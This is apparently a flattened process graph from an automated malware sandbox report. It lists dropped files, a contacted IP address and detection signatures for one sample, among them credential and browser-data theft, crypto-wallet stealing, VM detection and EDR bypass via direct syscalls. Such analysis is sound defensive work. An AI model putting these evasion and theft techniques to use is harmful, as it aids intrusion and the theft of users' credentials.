PE32 41->94 dropped 96 C:\Users\user\AppData\Local\...\msvcp80.dll, PE32 41->96 dropped 98 C:\Users\user\AppData\...\libssl-1_1.dll, PE32 41->98 dropped 100 6 other malicious files 41->100 dropped 68 ShortcutTaskAgent.exe 41->68         started        172 Windows Scripting host queries suspicious COM object (likely to drop second stage) 43->172 174 Query firmware table information (likely to detect VMs) 47->174 176 Tries to harvest and steal ftp login credentials 47->176 178 Tries to harvest and steal browser information (history, passwords, etc) 47->178 180 Tries to steal Crypto Currency Wallets 49->180 file14 signatures15 process16 dnsIp17 138 104.168.28.10, 61705, 61710, 61713 AS-COLOCROSSINGUS United States 55->138 140 127.0.0.1 unknown unknown 55->140 106 C:\Windows\Temp\gvh50gjo_3616.sys, PE32+ 55->106 dropped 216 Multi AV Scanner detection for dropped file 55->216 218 Detected unpacking (creates a PE file in dynamic memory) 55->218 220 Query firmware table information (likely to detect VMs) 55->220 228 3 other signatures 55->228 70 powershell.exe 55->70         started        73 powershell.exe 55->73         started        222 Found direct / indirect Syscall (likely to bypass EDR) 60->222 75 conhost.exe 62->75         started        224 Loading BitLocker PowerShell Module 64->224 108 C:\Users\user\AppData\Roaming\...\msvcr80.dll, PE32 68->108 dropped 110 C:\Users\user\AppData\Roaming\...\msvcp80.dll, PE32 68->110 dropped 112 C:\Users\user\AppData\...\libssl-1_1.dll, PE32 68->112 dropped 114 6 other malicious files 68->114 dropped 226 Switches to a custom stack to bypass stack traces 68->226 77 ShortcutTaskAgent.exe 68->77         started        file18 signatures19 process20 signatures21 208 Loading BitLocker PowerShell Module 70->208 79 conhost.exe 70->79         started        81 conhost.exe 73->81         started        210 Maps a DLL or memory area into another process 77->210 212 Switches to a custom stack to bypass stack traces 77->212 214 Found direct / indirect Syscall (likely to bypass EDR) 77->214 83 cmd.exe 77->83         started        process22 signatures23 164 Switches to a custom stack to bypass stack traces 83->164 86 conhost.exe 83->86         started        process24

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.